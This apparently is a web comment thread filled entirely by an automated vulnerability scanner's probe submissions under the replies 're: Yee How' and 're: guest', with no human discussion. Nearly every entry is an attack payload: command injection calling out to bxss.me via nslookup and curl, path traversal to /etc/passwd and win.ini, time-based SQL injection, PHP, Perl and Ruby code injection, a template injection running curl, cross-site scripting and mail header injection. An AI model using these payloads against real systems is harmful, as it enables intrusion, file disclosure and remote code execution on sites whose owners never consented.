&(nslookup hitqytewhvyrr91b24.bxss.me||perl -e "gethostbyname('hitqytewhvyrr91b24.bxss.me')")&'\"`0&(nslookup hitqytewhvyrr91b24.bxss.me||perl -e "gethostbyname('hitqytewhvyrr91b24.bxss.me')")&`'
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Yee How
|(nslookup hitwuetmhnqgd66eb8.bxss.me||perl -e "gethostbyname('hitwuetmhnqgd66eb8.bxss.me')")
re: Yee How
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Yee How
)
re: Yee How
`(nslookup hitteqhwnlcht1cbea.bxss.me||perl -e "gethostbyname('hitteqhwnlcht1cbea.bxss.me')")`
re: Yee How
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Yee How
!(()&&!|*|*|
re: Yee How
;(nslookup hitietvcnsafd1f8a6.bxss.me||perl -e "gethostbyname('hitietvcnsafd1f8a6.bxss.me')")|(nslookup hitietvcnsafd1f8a6.bxss.me||perl -e "gethostbyname('hitietvcnsafd1f8a6.bxss.me')")&(nslookup hitietvcnsafd1f8a6.bxss.me||perl -e "gethostbyname('hitietvcnsafd1f8a6.bxss.me')")
re: Yee How
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Yee How
^(#$!@#$)(()))******
re: Yee How
file:///etc/passwd
re: Yee How
/\../\../\../\../\../\../\../etc/passwd
re: Yee How
/WEB-INF/web.xml
re: Yee How
C:\WINDOWS\system32\drivers\etc\hosts
re: Yee How
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Yee How
'.gethostbyname(lc('hitgs'.'wpdiagyd0b760.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(87).chr(97).chr(88).'
re: Yee How
../../../../../../../../../../windows/win.ini%00.jpg
re: Yee How
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Yee How
".gethostbyname(lc("hitgz"."opjieechf744c.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(67).chr(118).chr(73)."
re: Yee How
/../../../../../../../../../../boot.ini
re: Yee How
Http://bxss.me/t/fit.txt
re: Yee How
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Yee How
http://bxss.me/t/fit.txt%3F.jpg
re: Yee How
..\..\..\..\..\..\..\..\windows\win.ini
re: Yee How
/etc/shells
re: Yee How
HttP://bxss.me/t/xss.html?%00
re: Yee How
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Yee How
c:/windows/win.ini
re: Yee How
bxss.me/t/xss.html?%00
re: Yee How
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Yee How
bxss.me
re: Yee How
"+"A".concat(70-3).concat(22*4).concat(102).concat(67).concat(117).concat(81)+(require"socket"
Socket.gethostbyname("hiteh"+"dyihfpqmdef3b.bxss.me.")[3].to_s)+"
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Yee How
'+'A'.concat(70-3).concat(22*4).concat(98).concat(82).concat(113).concat(81)+(require'socket'
Socket.gethostbyname('hitet'+'bywsvmila5aa9.bxss.me.')[3].to_s)+'
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Yee How
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Yee How
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Yee How
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Yee How
WEB-INF/web.xml
re: Yee How
';print(md5(31337));$a='
re: Yee How
WEB-INF\web.xml
re: Yee How
";print(md5(31337));$a="
re: Yee How
${@print(md5(31337))}
re: Yee How
'"
re: Yee How
${@print(md5(31337))}\
re: Yee How
<!--
re: Yee How
'.print(md5(31337)).'
re: Yee How
1
re: Yee How
1
re: Yee How
-1 OR 2+10-10-1=0+0+0+1 --
re: Yee How
-1 OR 3+10-10-1=0+0+0+1 --
re: Yee How
-1 OR 2+866-866-1=0+0+0+1
re: Yee How
-1 OR 3+866-866-1=0+0+0+1
re: Yee How
-1' OR 2+82-82-1=0+0+0+1 --
re: Yee How
-1' OR 3+82-82-1=0+0+0+1 --
re: Yee How
-1' OR 2+559-559-1=0+0+0+1 or 'sgbj5Amj'='
re: Yee How
-1' OR 3+559-559-1=0+0+0+1 or 'sgbj5Amj'='
re: Yee How
-1" OR 2+288-288-1=0+0+0+1 --
re: Yee How
-1" OR 3+288-288-1=0+0+0+1 --
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
KRpE58oY'; waitfor delay '0:0:15' --
re: Yee How
-5 OR 376=(SELECT 376 FROM PG_SLEEP(15))--
re: Yee How
-5) OR 931=(SELECT 931 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 235=(SELECT 235 FROM PG_SLEEP(15))--
re: Yee How
DM7isISK' OR 968=(SELECT 968 FROM PG_SLEEP(15))--
re: Yee How
GhN7pw8O') OR 884=(SELECT 884 FROM PG_SLEEP(15))--
re: Yee How
Ncyq6u9f')) OR 428=(SELECT 428 FROM PG_SLEEP(15))--
re: Yee How
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
1QT9PXYM20
re: Yee How
response.write(9544350*9016825)
re: Yee How
'+response.write(9544350*9016825)+'
re: Yee How
"+response.write(9544350*9016825)+"
re: Yee How
<esi:include src="http://bxss.me/rpb.png"/>
re: Yee How
${9999930+9999770}
re: Yee How
../../../../../../../../../../../../../../etc/passwd
re: Yee How
../../../../../../../../../../../../../../windows/win.ini
re: Yee How
file:///etc/passwd
re: Yee How
../
re: Yee How
)
re: Yee How
!(()&&!|*|*|
re: Yee How
^(#$!@#$)(()))******
re: Yee How
redirtest.acx
re: Yee How
echo enusvf$()\ krejhs\nz^xyu||a #' &echo enusvf$()\ krejhs\nz^xyu||a #|" &echo enusvf$()\ krejhs\nz^xyu||a #
re: Yee How
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Yee How
&echo jcfrfb$()\ dpkwbw\nz^xyu||a #' &echo jcfrfb$()\ dpkwbw\nz^xyu||a #|" &echo jcfrfb$()\ dpkwbw\nz^xyu||a #
re: Yee How
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Yee How
|echo rwguua$()\ kgozxq\nz^xyu||a #' |echo rwguua$()\ kgozxq\nz^xyu||a #|" |echo rwguua$()\ kgozxq\nz^xyu||a #
re: Yee How
/etc/shells
re: Yee How
expr 9000102789 - 932383
re: Yee How
../../../../../../../../../../../../../../etc/shells
re: Yee How
(nslookup -q=cname hitqqocitovgxe2145.bxss.me||curl hitqqocitovgxe2145.bxss.me))
re: Yee How
'.gethostbyname(lc('hitrx'.'nenntbomf6db4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(65).chr(97).chr(76).'
re: Yee How
c:/windows/win.ini
re: Yee How
$(nslookup -q=cname hitkgujaavkgycec45.bxss.me||curl hitkgujaavkgycec45.bxss.me)
re: Yee How
".gethostbyname(lc("hitqb"."rtmuuwmuc8744.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(73).chr(116).chr(73)."
re: Yee How
bxss.me
re: Yee How
&nslookup -q=cname hitckdiqhzsypdb1ae.bxss.me&'\"`0&nslookup -q=cname hitckdiqhzsypdb1ae.bxss.me&`'
re: Yee How
gethostbyname(lc('hitjz'.'dfafqrdg5d944.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(85).chr(108).chr(89)
re: Yee How
Http://bxss.me/t/fit.txt
re: Yee How
&(nslookup -q=cname hitlfczojelkj57ca2.bxss.me||curl hitlfczojelkj57ca2.bxss.me)&'\"`0&(nslookup -q=cname hitlfczojelkj57ca2.bxss.me||curl hitlfczojelkj57ca2.bxss.me)&`'
re: Yee How
http://bxss.me/t/fit.txt?.jpg
re: Yee How
|(nslookup -q=cname hitfztwfuljli10509.bxss.me||curl hitfztwfuljli10509.bxss.me)
re: Yee How
`(nslookup -q=cname hitirqbzwexrsd9256.bxss.me||curl hitirqbzwexrsd9256.bxss.me)`
re: Yee How
;(nslookup -q=cname hitbhtqfgjmbb6ea79.bxss.me||curl hitbhtqfgjmbb6ea79.bxss.me)|(nslookup -q=cname hitbhtqfgjmbb6ea79.bxss.me||curl hitbhtqfgjmbb6ea79.bxss.me)&(nslookup -q=cname hitbhtqfgjmbb6ea79.bxss.me||curl hitbhtqfgjmbb6ea79.bxss.me)
re: Yee How
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Yee How
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Yee How
|(nslookup${IFS}-q${IFS}cname${IFS}hitvmrdljishf88025.bxss.me||curl${IFS}hitvmrdljishf88025.bxss.me)
re: Yee How
';print(md5(31337));$a='
re: Yee How
&(nslookup${IFS}-q${IFS}cname${IFS}hitqdxtbopgjm15f60.bxss.me||curl${IFS}hitqdxtbopgjm15f60.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitqdxtbopgjm15f60.bxss.me||curl${IFS}hitqdxtbopgjm15f60.bxss.me)&`'
re: Yee How
";print(md5(31337));$a="
re: Yee How
${@print(md5(31337))}
re: Yee How
${@print(md5(31337))}\
re: Yee How
'.print(md5(31337)).'
re: Yee How
'"()
re: Yee How
'&&sleep(27*1000)*ncpmjr&&'
re: Yee How
"&&sleep(27*1000)*xgzafz&&"
re: Yee How
'||sleep(27*1000)*tznxdl||'
re: Yee How
HttP://bxss.me/t/xss.html?%00
re: Yee How
"||sleep(27*1000)*jkdjlq||"
re: Yee How
bxss.me/t/xss.html?%00
re: Yee How
"+"A".concat(70-3).concat(22*4).concat(102).concat(75).concat(108).concat(87)+(require"socket"
Socket.gethostbyname("hitnv"+"arvolzzb4d238.bxss.me.")[3].to_s)+"
re: Yee How
'+'A'.concat(70-3).concat(22*4).concat(106).concat(88).concat(118).concat(87)+(require'socket'
Socket.gethostbyname('hitez'+'btlhfbcp13a2e.bxss.me.')[3].to_s)+'
re: Yee How
'A'.concat(70-3).concat(22*4).concat(114).concat(83).concat(111).concat(90)+(require'socket'
Socket.gethostbyname('hitcb'+'pxlhxzwvaf972.bxss.me.')[3].to_s)
re: Yee How
'"
re: Yee How
replies
re: Yee How
<!--
re: Yee How
replies�
re: Yee How
replies/.
re: Yee How
'"()&%<zzz><ScRiPt >0mX5(9163)</ScRiPt>
re: Yee How
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitraggegysdc516a5.bxss.me")}}
re: Yee How
'"()&%<zzz><ScRiPt >0mX5(9291)</ScRiPt>
re: Yee How
9069583
re: Yee How
8IhxESW8
re: Yee How
*1
re: Yee How
*1
re: Yee How
*1
re: Yee How
*1
re: Yee How
-1 OR 5*5=25 --
re: Yee How
-1 OR 5*5=26 --
re: Yee How
-1 OR 5*5=25
re: Yee How
-1 OR 5*5=26
re: Yee How
*if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
-1 waitfor delay '0:0:15' --
re: Yee How
DqgdsMwp'; waitfor delay '0:0:15' --
re: Yee How
-1 OR 484=(SELECT 484 FROM PG_SLEEP(15))--
re: Yee How
-1) OR 689=(SELECT 689 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 334=(SELECT 334 FROM PG_SLEEP(15))--
re: Yee How
lb0AFK7t' OR 804=(SELECT 804 FROM PG_SLEEP(15))--
re: Yee How
Etvo44UF') OR 474=(SELECT 474 FROM PG_SLEEP(15))--
re: Yee How
MqVWlrfR')) OR 360=(SELECT 360 FROM PG_SLEEP(15))--
re: Yee How
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
'"
re: Yee How
@@Dlqxo
re: Yee How
(select 198766*667891)
re: Yee How
(select 198766*667891 from DUAL)
Screenshot of error via remote debug
re: guest
jkbUJUlf
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+740-740-1=0+0+0+1
re: guest
-1 OR 3+740-740-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
HVGiAcsT'; waitfor delay '0:0:15' --
re: guest
-5 OR 151=(SELECT 151 FROM PG_SLEEP(15))--
re: guest
-5) OR 650=(SELECT 650 FROM PG_SLEEP(15))--
re: guest
-1)) OR 350=(SELECT 350 FROM PG_SLEEP(15))--
re: guest
lSvbglfr' OR 396=(SELECT 396 FROM PG_SLEEP(15))--
re: guest
q1XXtud9') OR 39=(SELECT 39 FROM PG_SLEEP(15))--
re: guest
zMHIVfih')) OR 866=(SELECT 866 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@LtluM
re: guest
1CG8mp6zHGO
re: guest
response.write(9889699*9590713)
re: guest
'+response.write(9889699*9590713)+'
re: guest
"+response.write(9889699*9590713)+"
re: guest
%0abcc:074625.67-22200.67.12435.19990.2@bxss.me
re: guest
to@example.com>%0d%0abcc:074625.67-22201.67.12435.19990.2@bxss.me
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
${9999491+9999097}
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
echo nzkfkm$()\ vbeqau\nz^xyu||a #' &echo nzkfkm$()\ vbeqau\nz^xyu||a #|" &echo nzkfkm$()\ vbeqau\nz^xyu||a #
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
&echo qyluox$()\ oippox\nz^xyu||a #' &echo qyluox$()\ oippox\nz^xyu||a #|" &echo qyluox$()\ oippox\nz^xyu||a #
re: guest
/etc/passwd
re: guest
|echo olfbnc$()\ tejnax\nz^xyu||a #' |echo olfbnc$()\ tejnax\nz^xyu||a #|" |echo olfbnc$()\ tejnax\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
(nslookup hititdtloexvnf6285.bxss.me||perl -e "gethostbyname('hititdtloexvnf6285.bxss.me')")
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
$(nslookup hitvzzilghjoa44446.bxss.me||perl -e "gethostbyname('hitvzzilghjoa44446.bxss.me')")
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
&nslookup hitxiaaklhbrh1d6e4.bxss.me&'\"`0&nslookup hitxiaaklhbrh1d6e4.bxss.me&`'
re: guest
)
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
&(nslookup hitzkckxvnlzrc73bd.bxss.me||perl -e "gethostbyname('hitzkckxvnlzrc73bd.bxss.me')")&'\"`0&(nslookup hitzkckxvnlzrc73bd.bxss.me||perl -e "gethostbyname('hitzkckxvnlzrc73bd.bxss.me')")&`'
re: guest
!(()&&!|*|*|
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
|(nslookup hitjuokxjoppvf87d4.bxss.me||perl -e "gethostbyname('hitjuokxjoppvf87d4.bxss.me')")
re: guest
^(#$!@#$)(()))******
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
`(nslookup hitcelockhrxwc12e5.bxss.me||perl -e "gethostbyname('hitcelockhrxwc12e5.bxss.me')")`
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.